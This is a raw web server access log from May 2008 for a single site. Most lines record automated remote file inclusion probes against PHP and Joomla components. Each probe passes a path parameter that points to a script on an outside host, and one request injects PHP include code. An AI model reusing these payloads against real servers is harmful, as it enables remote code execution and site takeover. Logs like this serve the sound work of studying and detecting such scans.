212.116.174.9 - - [05/May/2008:09:52:17 -0700] "GET /logs/access_080312.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
67.19.105.42 - - [05/May/2008:09:52:18 -0700] "GET //index.php?option=com_custompages&cpage=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.105.42 - - [05/May/2008:09:52:18 -0700] "GET /logs/access_080215.log//index.php?option=com_custompages&cpage=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.105.42 - - [05/May/2008:09:52:18 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:09:52:20 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:09:52:21 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
67.19.105.42 - - [05/May/2008:09:52:23 -0700] "GET //index.php?option=com_custompages&cpage=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.105.42 - - [05/May/2008:09:52:23 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:09:52:24 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.202.88.113 - - [05/May/2008:09:52:26 -0700] "GET /logs//ashnews.php?pathtoashnews=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.202.88.113 - - [05/May/2008:09:52:26 -0700] "GET //ashnews.php?pathtoashnews=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [05/May/2008:09:52:27 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [05/May/2008:09:52:27 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [05/May/2008:09:52:27 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [05/May/2008:09:52:27 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [05/May/2008:09:52:27 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [05/May/2008:09:52:27 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
83.16.29.227 - - [05/May/2008:09:53:16 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/anacoramadrid/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.16.29.227 - - [05/May/2008:09:53:17 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/anacoramadrid/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.145.85 - - [05/May/2008:09:53:41 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/fitra.yulia/indah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.145.85 - - [05/May/2008:09:53:41 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/fitra.yulia/indah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.42 - - [05/May/2008:09:53:53 -0700] "GET /logs/access_080311.log//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.113.24.154 - - [05/May/2008:09:53:54 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [05/May/2008:09:53:55 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [05/May/2008:09:53:55 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
67.212.173.42 - - [05/May/2008:09:53:58 -0700] "GET //index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [05/May/2008:09:53:58 -0700] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.208.68.157 - - [05/May/2008:09:54:25 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.68.157 - - [05/May/2008:09:54:25 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.68.157 - - [05/May/2008:09:54:25 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.61.244.6 - - [05/May/2008:09:54:49 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://trosken.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
209.61.244.6 - - [05/May/2008:09:54:49 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://trosken.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
221.143.49.246 - - [05/May/2008:09:54:53 -0700] "GET /logs/access_080306.log//admin/classes/TplLoad.php?full_path_to_public_program=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.143.49.246 - - [05/May/2008:09:54:53 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.143.49.246 - - [05/May/2008:09:54:54 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.202.88.113 - - [05/May/2008:09:55:15 -0700] "GET //ashnews.php?pathtoashnews=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
221.143.49.246 - - [05/May/2008:09:55:20 -0700] "GET /logs/access_080313.log//admin/classes/TplLoad.php?full_path_to_public_program=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
78.90.30.31 - - [05/May/2008:09:55:30 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
78.90.30.31 - - [05/May/2008:09:55:32 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
78.90.30.31 - - [05/May/2008:09:55:32 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.202.88.113 - - [05/May/2008:09:55:41 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
147.46.222.74 - - [05/May/2008:09:55:49 -0700] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.freewebs.com/anacoramadrid/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
147.46.222.74 - - [05/May/2008:09:55:49 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.freewebs.com/anacoramadrid/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
147.46.222.74 - - [05/May/2008:09:55:50 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.freewebs.com/anacoramadrid/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.112.121.111 - - [05/May/2008:09:56:08 -0700] "GET /logs/access_080309.log//FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
210.112.121.111 - - [05/May/2008:09:56:08 -0700] "GET //FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
210.112.121.111 - - [05/May/2008:09:56:09 -0700] "GET /logs//FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
210.112.121.111 - - [05/May/2008:09:56:09 -0700] "GET /logs/access_080309.log//FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
210.112.121.111 - - [05/May/2008:09:56:09 -0700] "GET //FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
210.112.121.111 - - [05/May/2008:09:56:10 -0700] "GET /logs//FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
85.25.145.85 - - [05/May/2008:09:56:35 -0700] "GET /logs/access_080308.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/fitra.yulia/indah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
147.46.222.74 - - [05/May/2008:09:56:48 -0700] "GET /logs/access_080321.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.freewebs.com/anacoramadrid/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.200.95.142 - - [05/May/2008:09:56:53 -0700] "GET /logs/access_080324.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [05/May/2008:09:56:55 -0700] "GET /logs/access_080324.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.91.246.64 - - [05/May/2008:09:57:17 -0700] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?inc_dir=http://statesidelogistics.com/images/r7.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.91.246.64 - - [05/May/2008:09:57:18 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://statesidelogistics.com/images/r7.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.202.88.113 - - [05/May/2008:09:57:19 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.202.88.113 - - [05/May/2008:09:57:19 -0700] "GET //ashnews.php?pathtoashnews=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.202.88.113 - - [05/May/2008:09:57:19 -0700] "GET /logs//ashnews.php?pathtoashnews=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:09:57:24 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:09:57:24 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:09:57:25 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:09:57:28 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
78.90.30.31 - - [05/May/2008:09:57:38 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
221.143.49.246 - - [05/May/2008:09:58:03 -0700] "GET /logs/access_080315.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
58.26.137.64 - - [05/May/2008:09:58:04 -0700] "GET /logs/access_080218.log/index1.php?=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [05/May/2008:09:58:05 -0700] "GET /index1.php?=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [05/May/2008:09:58:05 -0700] "GET /logs/index1.php?=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.25.145.85 - - [05/May/2008:09:58:09 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
85.25.145.85 - - [05/May/2008:09:58:10 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
189.236.5.128 - - [05/May/2008:09:58:23 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
189.236.5.128 - - [05/May/2008:09:58:24 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:09:58:42 -0700] "GET /logs/access.log//language.inc.php?langs_dir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:09:58:42 -0700] "GET //language.inc.php?langs_dir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:09:58:42 -0700] "GET /logs//language.inc.php?langs_dir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
221.143.49.246 - - [05/May/2008:09:58:45 -0700] "GET /logs/access_080201.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.143.49.246 - - [05/May/2008:09:58:45 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.143.49.246 - - [05/May/2008:09:58:46 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.113.24.154 - - [05/May/2008:09:59:14 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [05/May/2008:09:59:14 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
208.116.44.60 - - [05/May/2008:09:59:16 -0700] "GET /logs/access_080120.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [05/May/2008:09:59:17 -0700] "GET /logs/access_080120.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.92.140.30 - - [05/May/2008:09:59:38 -0700] "GET /logs/access.log//components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=http://www.trosken.com/idra.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.92.140.30 - - [05/May/2008:09:59:38 -0700] "GET //components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=http://www.trosken.com/idra.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.208.68.157 - - [05/May/2008:10:00:22 -0700] "GET /logs/access_080120.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.11.108.130 - - [05/May/2008:10:00:52 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [05/May/2008:10:00:56 -0700] "GET /logs//calendar.php?l=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [05/May/2008:10:00:56 -0700] "GET //calendar.php?l=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [05/May/2008:10:01:05 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [05/May/2008:10:01:05 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.33.45 - - [05/May/2008:10:01:10 -0700] "GET /logs/access_080123.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.33.45 - - [05/May/2008:10:01:11 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.33.45 - - [05/May/2008:10:01:11 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
193.202.88.113 - - [05/May/2008:10:01:16 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 200 4139 "-" "libwww-perl/5.811" "www.dmulk.com"
85.214.33.45 - - [05/May/2008:10:01:30 -0700] "GET /logs/access_080114.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
206.105.202.170 - - [05/May/2008:10:01:37 -0700] "GET / HTTP/1.1" 200 11606 "http://www.st-owners.com/forums/showthread.php?t=39865" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
206.105.202.170 - - [05/May/2008:10:01:41 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.1" 200 9037 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
206.105.202.170 - - [05/May/2008:10:01:42 -0700] "GET /blog/wp-content/themes/default/images/kubrickbgcolor.jpg HTTP/1.1" 200 556 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
83.103.23.40 - - [05/May/2008:10:01:52 -0700] "GET /logs//calendar.php?l=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [05/May/2008:10:01:52 -0700] "GET /logs//calendar.php?l=ftp://128.175.10.3/incoming/smile01.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [05/May/2008:10:01:53 -0700] "GET //calendar.php?l=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [05/May/2008:10:01:53 -0700] "GET //calendar.php?l=ftp://128.175.10.3/incoming/smile01.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.236.5.128 - - [05/May/2008:10:02:11 -0700] "GET /logs/access_080309.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:10:02:17 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:10:02:17 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:10:02:18 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:10:02:25 -0700] "GET /logs/access_080312.log//admin/business_inc/saveserver.php?thisdir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
